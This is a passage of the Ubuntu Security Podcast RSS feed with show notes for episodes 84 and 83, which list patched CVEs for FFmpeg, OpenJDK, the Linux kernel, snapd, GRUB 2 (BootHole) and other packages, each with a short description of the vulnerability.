<li><a href="https://ubuntu.com/security/CVE-2019-20907">CVE-2019-20907</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17514">CVE-2019-17514</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>CPU based DoS via infinite loop in parsing a crafted tar archive</li>
</ul>
<h3 id="usn-4431-1-ffmpeg-vulnerabilities-01-31">[<a href="https://usn.ubuntu.com/4431-1/">USN-4431-1</a>] FFmpeg vulnerabilities [01:31]</h3>
<ul>
<li>9 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04
LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-13904">CVE-2020-13904</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12284">CVE-2020-12284</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17542">CVE-2019-17542</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17539">CVE-2019-17539</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13390">CVE-2019-13390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13312">CVE-2019-13312</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12730">CVE-2019-12730</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11338">CVE-2019-11338</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15822">CVE-2018-15822</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF, use of uninitialised variables, heap buffer over-read, NULL pointer
deref etc - most via oss-fuzz</li>
</ul>
<h3 id="usn-4430-2-pillow-vulnerabilities-02-15">[<a href="https://usn.ubuntu.com/4430-2/">USN-4430-2</a>] Pillow vulnerabilities [02:15]</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11538">CVE-2020-11538</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10994">CVE-2020-10994</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10379">CVE-2020-10379</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10378">CVE-2020-10378</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10177">CVE-2020-10177</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 buffer overflows in TIFF decoder</li>
</ul>
<h3 id="usn-4433-1-openjdk-vulnerabilities-02-33">[<a href="https://usn.ubuntu.com/4433-1/">USN-4433-1</a>] OpenJDK vulnerabilities [02:33]</h3>
<ul>
<li>8 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14621">CVE-2020-14621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14593">CVE-2020-14593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14583">CVE-2020-14583</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14581">CVE-2020-14581</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14577">CVE-2020-14577</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14573">CVE-2020-14573</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14562">CVE-2020-14562</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14556">CVE-2020-14556</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>11.0.8 upstream release - thanks to Tiago from Foundations for preparing
these</li>
<li>Usual mix of issues for Java - possible sandbox escape, crash in TIFF
decoder, failure to properly validate TLS certs in some cases etc</li>
</ul>
<h3 id="usn-4434-1-libvncserver-vulnerabilities-03-11">[<a href="https://usn.ubuntu.com/4434-1/">USN-4434-1</a>] LibVNCServer vulnerabilities [03:11]</h3>
<ul>
<li>12 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04
LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14405">CVE-2020-14405</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14404">CVE-2020-14404</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14403">CVE-2020-14403</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14402">CVE-2020-14402</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14401">CVE-2020-14401</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14400">CVE-2020-14400</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14399">CVE-2020-14399</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14398">CVE-2020-14398</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14397">CVE-2020-14397</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14396">CVE-2020-14396</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20840">CVE-2019-20840</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20839">CVE-2019-20839</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 NULL ptr deref, infinite loop -&gt; DoS when closing connection,
misaligned data access leading to possible crash, integer overflow, OOB
read etc</li>
</ul>
<h3 id="usn-4435-1-usn-4435-2-clamav-vulnerabilities-04-03">[<a href="https://usn.ubuntu.com/4435-1/">USN-4435-1</a>, <a href="https://usn.ubuntu.com/4435-2/">USN-4435-2</a>] ClamAV vulnerabilities [04:03]</h3>
<ul>
<li>3 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM),
Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-3481">CVE-2020-3481</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-3350">CVE-2020-3350</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-3327">CVE-2020-3327</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>0.102.4 release</li>
<li>NULL ptr deref on crafted EGG, race condition where could replace target
dir with a symlink and get clamscan to remove that target, OOB read in
ARJ decoder (previous fix <a href="https://ubuntusecuritypodcast.org/episode-76/">Episode 76</a> was incomplete)</li>
</ul>
<h3 id="usn-4436-1-usn-4436-2-librsvg-vulnerabilities-regression-04-55">[<a href="https://usn.ubuntu.com/4436-1/">USN-4436-1</a>, <a href="https://usn.ubuntu.com/4436-2/">USN-4436-2</a>] librsvg vulnerabilities / regression [04:55]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-20446">CVE-2019-20446</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-11464">CVE-2017-11464</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Update caused a regression since it removed a symbol - backed out,
waiting for a more complete fix from upstream</li>
</ul>
<h3 id="usn-4437-1-libslirp-vulnerability-05-26">[<a href="https://usn.ubuntu.com/4437-1/">USN-4437-1</a>] libslirp vulnerability [05:26]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-10756">CVE-2020-10756</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB read in icmp6 echo reply - guest leaks contents of host memory  -&gt;
info disclosure</li>
</ul>
<h3 id="usn-4438-1-sqlite-vulnerability-05-45">[<a href="https://usn.ubuntu.com/4438-1/">USN-4438-1</a>] SQLite vulnerability [05:45]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15358">CVE-2020-15358</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer overflow</li>
</ul>
<h3 id="usn-4439-1-linux-kernel-vulnerabilities-05-51">[<a href="https://usn.ubuntu.com/4439-1/">USN-4439-1</a>] Linux kernel vulnerabilities [05:51]</h3>
<ul>
<li>14 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15780">CVE-2020-15780</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20908">CVE-2019-20908</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12380">CVE-2019-12380</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13974">CVE-2020-13974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11935">CVE-2020-11935</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10768">CVE-2020-10768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10767">CVE-2020-10767</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10766">CVE-2020-10766</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10757">CVE-2020-10757</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10732">CVE-2020-10732</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20810">CVE-2019-20810</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19462">CVE-2019-19462</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19036">CVE-2019-19036</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16089">CVE-2019-16089</a> <!-- raw HTML omitted --></li>
<li>5.0 (gke/oem)</li>
</ul>
</li>
</ul>
<h3 id="usn-4440-1-linux-kernel-vulnerabilities-06-05">[<a href="https://usn.ubuntu.com/4440-1/">USN-4440-1</a>] Linux kernel vulnerabilities [06:05]</h3>
<ul>
<li>12 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15780">CVE-2020-15780</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13974">CVE-2020-13974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11935">CVE-2020-11935</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10768">CVE-2020-10768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10767">CVE-2020-10767</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10766">CVE-2020-10766</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10757">CVE-2020-10757</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10732">CVE-2020-10732</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20908">CVE-2019-20908</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20810">CVE-2019-20810</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19462">CVE-2019-19462</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16089">CVE-2019-16089</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.3 (hwe / azure / gcp / gke / oracle)</li>
</ul>
<h3 id="usn-4441-1-mysql-vulnerabilities-06-17">[<a href="https://usn.ubuntu.com/4441-1/">USN-4441-1</a>] MySQL vulnerabilities [06:17]</h3>
<ul>
<li>30 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04
LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14702">CVE-2020-14702</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14697">CVE-2020-14697</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14680">CVE-2020-14680</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14678">CVE-2020-14678</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14663">CVE-2020-14663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14656">CVE-2020-14656</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14654">CVE-2020-14654</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14651">CVE-2020-14651</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14643">CVE-2020-14643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14641">CVE-2020-14641</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14634">CVE-2020-14634</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14633">CVE-2020-14633</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14632">CVE-2020-14632</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14631">CVE-2020-14631</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14624">CVE-2020-14624</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14623">CVE-2020-14623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14620">CVE-2020-14620</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14619">CVE-2020-14619</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14597">CVE-2020-14597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14591">CVE-2020-14591</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14586">CVE-2020-14586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14576">CVE-2020-14576</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14575">CVE-2020-14575</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14568">CVE-2020-14568</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14559">CVE-2020-14559</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14553">CVE-2020-14553</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14550">CVE-2020-14550</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14547">CVE-2020-14547</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14540">CVE-2020-14540</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14539">CVE-2020-14539</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>8.0.21 (focal)</li>
<li>5.7.31 (bionic / xenial)</li>
</ul>
<h3 id="usn-4442-1-sympa-vulnerabilities-06-54">[<a href="https://usn.ubuntu.com/4442-1/">USN-4442-1</a>] Sympa vulnerabilities [06:54]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-10936">CVE-2020-10936</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1000671">CVE-2018-1000671</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1000550">CVE-2018-1000550</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Mailing list manager - possible privesc via injection of environment
variables to run setuid wrappers arbitrary code</li>
</ul>
<h3 id="usn-4443-1-firefox-vulnerabilities-07-27">[<a href="https://usn.ubuntu.com/4443-1/">USN-4443-1</a>] Firefox vulnerabilities [07:27]</h3>
<ul>
<li>9 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04
LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15655">CVE-2020-15655</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15659">CVE-2020-15659</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15658">CVE-2020-15658</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15656">CVE-2020-15656</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15654">CVE-2020-15654</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15653">CVE-2020-15653</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15652">CVE-2020-15652</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6514">CVE-2020-6514</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6463">CVE-2020-6463</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>79.0</li>
</ul>
<h3 id="usn-4432-1-grub-2-vulnerabilities-07-39">[<a href="https://usn.ubuntu.com/4432-1/">USN-4432-1</a>] GRUB 2 vulnerabilities [07:39]</h3>
<ul>
<li>8 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15707">CVE-2020-15707</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15705">CVE-2020-15705</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14308">CVE-2020-14308</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14311">CVE-2020-14311</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14310">CVE-2020-14310</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14309">CVE-2020-14309</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15706">CVE-2020-15706</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10713">CVE-2020-10713</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="alex-and-joe-take-an-in-depth-and-behind-the-scenes-look-at-boothole-grub-2-08-14">Alex and Joe take an in-depth and behind-the-scenes look at BootHole / GRUB 2 [08:14]</h3>
<ul>
<li><a href="https://ubuntu.com/blog/mitigating-boothole-theres-a-hole-in-the-boot-cve-2020-10713-and-related-vulnerabilities">https://ubuntu.com/blog/mitigating-boothole-theres-a-hole-in-the-boot-cve-2020-10713-and-related-vulnerabilities</a></li>
<li><a href="https://eclypsium.com/2020/07/29/theres-a-hole-in-the-boot/">https://eclypsium.com/2020/07/29/theres-a-hole-in-the-boot/</a></li>
<li><a href="https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/GRUB2SecureBootBypass">https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/GRUB2SecureBootBypass</a></li>
</ul>
<h3 id="alex-hints-at-pending-future-secureboot-db-update-23-55">Alex hints at pending future secureboot-db update [23:55]</h3>
<ul>
<li><a href="https://uefi.org/revocationlistfile">https://uefi.org/revocationlistfile</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E084.mp3" length="24350838" type="audio/mpeg" /><itunes:duration>25:21</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 83
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-83/</link>
          <pubDate>Fri, 24 Jul 2020 15:48:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>6b30c5a284402264c8293f99c92cdf36688884f475fb4144e4809ec49906f42ff29b9d5eba00c14e51690f292403e7646c3b21c89f6464e188716daaa56c4bec</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 83</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week Joe talks Linux Security Modules stacking with John Johansen and
  Steve Beattie plus Alex looks at security updates for snapd, the Linux
  kernel and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week Joe talks Linux Security Modules stacking with John Johansen and
  Steve Beattie plus Alex looks at security updates for snapd, the Linux
  kernel and more.
  </itunes:summary>
        <description>  This week Joe talks Linux Security Modules stacking with John Johansen and
  Steve Beattie plus Alex looks at security updates for snapd, the Linux
  kernel and more.
  </description>
        <googleplay:description>  This week Joe talks Linux Security Modules stacking with John Johansen and
  Steve Beattie plus Alex looks at security updates for snapd, the Linux
  kernel and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week Joe talks Linux Security Modules stacking with John Johansen and
Steve Beattie plus Alex looks at security updates for snapd, the Linux
kernel and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>24 unique CVEs addressed</p>
<h3 id="usn-4199-2-libvpx-vulnerabilities-01-05">[<a href="https://usn.ubuntu.com/4199-2/">USN-4199-2</a>] libvpx vulnerabilities [01:05]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9433">CVE-2019-9433</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9232">CVE-2019-9232</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-13194">CVE-2017-13194</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>VP8/VP9 video code (webm)</li>
<li>Various OOB read on crafted input</li>
</ul>
<h3 id="usn-4424-1-snapd-vulnerabilities-01-38">[<a href="https://usn.ubuntu.com/4424-1/">USN-4424-1</a>] snapd vulnerabilities [01:38]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11934">CVE-2020-11934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11933">CVE-2020-11933</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>James Henstridge from Ubuntu Desktop team</li>
<li>snapd sandbox for strict mode snaps - within sandbox provides xdg-open
implementation which can forward to the real xdg-open outside the
sandbox - but would use XDG_DATA_DIRS env from the snap when launching
xdg-open outside of the snap - XDG_DATA_DIRS could then contain a
directory which the snap itself controls - allows to launch arbitrary
binaries from the snap outside of confinement</li>
<li>Fixed to not incorporate XDG_DATA_DIRS from the snap</li>
<li>cloud-init would run on every boot without restriction - supports the
concept of loading meta-data from an external disk - so a local attacker
with physical access could alter the boot sequence - would be an issue
with FDE since could intercept the disk encryption key etc - fixed via
snapd to disable cloud-init after the first boot since cloud-init is
managed by snapd
<ul>
<li>Is only an issue for Ubuntu Core 16/18 devices which employed FDE</li>
<li>Doesn&rsquo;t affect UC20</li>
</ul>
</li>
</ul>
<h3 id="usn-4425-1-linux-kernel-vulnerabilities-06-20">[<a href="https://usn.ubuntu.com/4425-1/">USN-4425-1</a>] Linux kernel vulnerabilities [06:20]</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15780">CVE-2020-15780</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11935">CVE-2020-11935</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19462">CVE-2019-19462</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16089">CVE-2019-16089</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 kernel (focal / bionic hwe)</li>
<li>Possible bypass of Secure Boot lockdown protections via loading of ACPI
tables via configs - provides a means of arbitrary memory write - allows
root user to bypass lockdown</li>
<li>aufs inode reference count issue - BUG() -&gt; DoS</li>
<li>relay subsystem crash (<a href="https://ubuntusecuritypodcast.org/episode-81/">Episode 81</a>)</li>
</ul>
<h3 id="usn-4426-1-linux-kernel-vulnerabilities-7-32">[<a href="https://usn.ubuntu.com/4426-1/">USN-4426-1</a>] Linux kernel vulnerabilities [7:32]</h3>
<ul>
<li>4 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15780">CVE-2020-15780</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11935">CVE-2020-11935</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10757">CVE-2020-10757</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20908">CVE-2019-20908</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 kernel (bionic / xenial hwe)</li>
<li>ACPI lockdown bypass / aufs inode above</li>
<li>Second lockdown bypass via loading of ACPI tables via the SSDT EFI
variable similar to above</li>
<li>DAX (direct access to files in persistent memory arrays) huge pages
support - abuse mremap() to gain root privileges - requires the system to
make use of DAX storage to be able to exploit</li>
</ul>
<h3 id="usn-4427-1-linux-kernel-vulnerabilities-08-30">[<a href="https://usn.ubuntu.com/4427-1/">USN-4427-1</a>] Linux kernel vulnerabilities [08:30]</h3>
<ul>
<li>10 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-12380">CVE-2019-12380</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13974">CVE-2020-13974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11935">CVE-2020-11935</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10768">CVE-2020-10768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10767">CVE-2020-10767</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10766">CVE-2020-10766</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10732">CVE-2020-10732</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20908">CVE-2019-20908</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20810">CVE-2019-20810</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19947">CVE-2019-19947</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 kernel (xenial / trusty hwe)</li>
<li>aufs</li>
<li>Various means to bypass spectre related mitigations</li>
<li>SSDT ACPI lockdown bypass</li>
</ul>
<h3 id="usn-4429-1-evolution-data-server-vulnerability-09-12">[<a href="https://usn.ubuntu.com/4429-1/">USN-4429-1</a>] Evolution Data Server vulnerability [09:12]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14928">CVE-2020-14928</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Very similar to recent mutt &amp; Thunderbird vuln from <a href="https://ubuntusecuritypodcast.org/episode-81/">Episode 81</a> / <a href="https://ubuntusecuritypodcast.org/episode-82/">Episode
82</a></li>
<li>Would read extra data after clear-text &ldquo;begin TLS&rdquo; when initiating
STARTTLS - would allow an untrusted attacker who could intercept and
modify traffic to inject arbitrary responses that then get processed
later as though they had come from the trusted, encrypted connection to
the server - fixed in same way as mutt by clearing buffered content when
starting TLS</li>
</ul>
<h3 id="usn-4430-1-pillow-vulnerabilities-10-24">[<a href="https://usn.ubuntu.com/4430-1/">USN-4430-1</a>] Pillow vulnerabilities [10:24]</h3>
<ul>
